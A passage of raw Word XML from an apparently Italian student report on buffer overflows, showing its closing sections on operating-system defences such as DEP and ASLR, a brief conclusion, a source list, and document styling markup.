          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Microsoft Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> lo supportano sotto il nome di Data </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Execution</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Prevention</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> (DEP) (o protezione esecuzione programmi).</w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Un'altra tecnica di difesa a livello di sistema operativo è l'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>space</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> layout </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>randomization</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> (ASLR)</w:t>
      </w:r>
      <w:r w:rsidRPr="00736880">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> che consiste nel rendere parzialmente casuale l'indirizzo delle funzioni di libreria e delle aree di memoria più importanti; ciò rende più complessa (ma non impossibile) l'esecuzione di codice tramite exploit perché costringe l'attaccante a cercare l'indirizzo del codice da eseguire tramite una serie di tentativi rilevabili sia dalla vittima, sia da eventuali SW di protezione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2581F9A5" w14:textId="34A52509" w:rsidR="0062275C" w:rsidRPr="008C1448" w:rsidRDefault="00736880" w:rsidP="008C1448">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc76047780"/>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Conclusioni</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="3E8AAC80" w14:textId="5AAA66D0" w:rsidR="00736880" w:rsidRDefault="00736880" w:rsidP="00736880">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">In conclusione, possiamo dire che esistono </w:t>
      </w:r>
      <w:r w:rsidR="00FC1DC0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tanti modi per difendersi. A mio parere, è un buon inizio progettare con un linguaggio ad alto livello per poi adottare anche le altre difese. Se non si può</w:t>
      </w:r>
      <w:r w:rsidR="008C1448">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> implementare un linguaggio ad alto livello</w:t>
      </w:r>
      <w:r w:rsidR="00FC1DC0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008C1448">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>si possono adoperare</w:t>
      </w:r>
      <w:r w:rsidR="00FC1DC0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> molte altre tecniche, come ad esempio </w:t>
      </w:r>
      <w:r w:rsidR="003441B6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>l’ASLR</w:t>
      </w:r>
      <w:r w:rsidR="008C1448">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. Tra l’altro i sistemi operativi godono di diverse funzionalità di difesa</w:t>
      </w:r>
      <w:r w:rsidR="0013419F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="202122"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> per essere ancora più sicuri, oltre a poter utilizzare gli strumenti scritti sopra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187D194D" w14:textId="4F3FE402" w:rsidR="003441B6" w:rsidRDefault="003441B6" w:rsidP="008C1448">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc76047781"/>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="008C1448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Fonti utilizzate</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="611AF35F" w14:textId="77777777" w:rsidR="0013419F" w:rsidRPr="0013419F" w:rsidRDefault="0013419F" w:rsidP="0013419F"/>
    <w:p w14:paraId="36FB3BFD" w14:textId="500C3CCA" w:rsidR="0062275C" w:rsidRPr="0013419F" w:rsidRDefault="0013419F" w:rsidP="0013419F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId43" w:history="1">
        <w:r w:rsidRPr="0013419F">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=qSnPayW6F7U&amp;t=406s</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="61C81B92" w14:textId="7DDFDD29" w:rsidR="0013419F" w:rsidRPr="0013419F" w:rsidRDefault="0013419F" w:rsidP="0013419F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId44" w:history="1">
        <w:r w:rsidRPr="0013419F">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>https://it.wikipedia.org/wiki/Buffer_overflow</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7796F044" w14:textId="6E447EE2" w:rsidR="0013419F" w:rsidRPr="0013419F" w:rsidRDefault="0013419F" w:rsidP="0013419F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidRPr="0013419F">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>https://github.com/cytopia/badchars</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3EF33B08" w14:textId="2E8C164A" w:rsidR="0013419F" w:rsidRPr="0013419F" w:rsidRDefault="0013419F" w:rsidP="0013419F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013419F">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>https://github.com/corelan/mona</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E55958" w14:textId="74620DB9" w:rsidR="0062275C" w:rsidRPr="008609E1" w:rsidRDefault="0062275C" w:rsidP="008609E1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50A6BE7F" w14:textId="77777777" w:rsidR="008609E1" w:rsidRPr="00C665BE" w:rsidRDefault="008609E1" w:rsidP="00336633">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="008609E1" w:rsidRPr="00C665BE" w:rsidSect="004D62CA">
      <w:footerReference w:type="default" r:id="rId4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B7EF7" w14:textId="77777777" w:rsidR="00AF62C8" w:rsidRDefault="00AF62C8" w:rsidP="001D050C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="043ED1CF" w14:textId="77777777" w:rsidR="00AF62C8" w:rsidRDefault="00AF62C8" w:rsidP="001D0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181516"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w14:paraId="1F9FDA01" w14:textId="59DA76BA" w:rsidR="004D62CA" w:rsidRDefault="004D62CA">
        <w:pPr>
          <w:pStyle w:val="Pidipagina"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="1A696892" w14:textId="77777777" w:rsidR="001D050C" w:rsidRDefault="001D050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271B1" w14:textId="77777777" w:rsidR="00AF62C8" w:rsidRDefault="00AF62C8" w:rsidP="001D050C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="19D4FA49" w14:textId="77777777" w:rsidR="00AF62C8" w:rsidRDefault="00AF62C8" w:rsidP="001D0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3951"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="377853BE"/>
    <w:lvl w:ilvl="0" w:tplc="332A24C4">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2729DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4582F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41958B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C400B0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ACB4248"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7C8A5EBE"/>
    <w:lvl w:ilvl="0" w:tplc="FD486FF2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="auto"/>
        <w:sz w:val="22"/>
        <w:szCs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CB70551"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4CCA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D3C98"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C0749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AF44970"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1908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A72C6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B7FC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E2243"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="218C64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361EA1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="786E8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6B3393C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A3161E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8"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="7"/>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32"/>
    <w:rsid w:val="00052309"/>
    <w:rsid w:val="00065CFE"/>
    <w:rsid w:val="00092635"/>
    <w:rsid w:val="000C781D"/>
    <w:rsid w:val="001063E0"/>
    <w:rsid w:val="0013419F"/>
    <w:rsid w:val="001919B1"/>
    <w:rsid w:val="001C2D23"/>
    <w:rsid w:val="001D050C"/>
    <w:rsid w:val="00225C29"/>
    <w:rsid w:val="002343CF"/>
    <w:rsid w:val="00246E46"/>
    <w:rsid w:val="002C4137"/>
    <w:rsid w:val="00336633"/>
    <w:rsid w:val="003441B6"/>
    <w:rsid w:val="003714E2"/>
    <w:rsid w:val="003F67D9"/>
    <w:rsid w:val="00441769"/>
    <w:rsid w:val="00453887"/>
    <w:rsid w:val="004D62CA"/>
    <w:rsid w:val="004F0AEB"/>
    <w:rsid w:val="004F5386"/>
    <w:rsid w:val="004F7EF5"/>
    <w:rsid w:val="005302B2"/>
    <w:rsid w:val="00533721"/>
    <w:rsid w:val="0053382D"/>
    <w:rsid w:val="00534E3A"/>
    <w:rsid w:val="00586467"/>
    <w:rsid w:val="0062275C"/>
    <w:rsid w:val="00682B3B"/>
    <w:rsid w:val="0069256B"/>
    <w:rsid w:val="006931A7"/>
    <w:rsid w:val="00736880"/>
    <w:rsid w:val="00742446"/>
    <w:rsid w:val="00751302"/>
    <w:rsid w:val="00780361"/>
    <w:rsid w:val="00792432"/>
    <w:rsid w:val="0083237E"/>
    <w:rsid w:val="00851D8C"/>
    <w:rsid w:val="008609E1"/>
    <w:rsid w:val="008C1448"/>
    <w:rsid w:val="008C7CBA"/>
    <w:rsid w:val="00937CAE"/>
    <w:rsid w:val="009423A4"/>
    <w:rsid w:val="00980488"/>
    <w:rsid w:val="009A55A7"/>
    <w:rsid w:val="009B09DC"/>
    <w:rsid w:val="009E2AE1"/>
    <w:rsid w:val="00A33AA3"/>
    <w:rsid w:val="00A91786"/>
    <w:rsid w:val="00AF62C8"/>
    <w:rsid w:val="00B3171E"/>
    <w:rsid w:val="00B83732"/>
    <w:rsid w:val="00BF455E"/>
    <w:rsid w:val="00C17173"/>
    <w:rsid w:val="00C419AC"/>
    <w:rsid w:val="00C665BE"/>
    <w:rsid w:val="00C83D4B"/>
    <w:rsid w:val="00D614D9"/>
    <w:rsid w:val="00E377FF"/>
    <w:rsid w:val="00F077DB"/>
    <w:rsid w:val="00F85D48"/>
    <w:rsid w:val="00FA1BA6"/>
    <w:rsid w:val="00FC1DC0"/>
    <w:rsid w:val="00FF05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04D6A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2CC03692-12F6-431D-842B-A1BF04B3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050C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo1Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="001D050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olo2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo2Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001D050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1D050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1D050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olo5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo5Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001D050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olo6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo6Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001D050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olo7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo7Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001D050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olo8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo8Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001D050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olo9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo9Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001D050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D050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D050C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Pidipagina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normale"/>
    <w:link w:val="PidipaginaCarattere"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D050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D050C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo1Carattere">
    <w:name w:val="Titolo 1 Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Titolo1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="001D050C"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1F3864" w:themeColor="accent1" w:themeShade="80"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo2Carattere">
    <w:name w:val="Titolo 2 Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Titolo2"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="001D050C"/>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1D050C"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"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1D050C"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo5Carattere">
    <w:name w:val="Titolo 5 Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Titolo5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="001D050C"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:caps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo6Carattere">
    <w:name w:val="Titolo 6 Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Titolo6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="001D050C"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:caps/>
      <w:color w:val="1F3864" w:themeColor="accent1" w:themeShade="80"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo7Carattere">
    <w:name w:val="Titolo 7 Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Titolo7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="001D050C"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F3864" w:themeColor="accent1" w:themeShade="80"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo8Carattere">
    <w:name w:val="Titolo 8 Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Titolo8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="001D050C"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="1F3864" w:themeColor="accent1" w:themeShade="80"/>
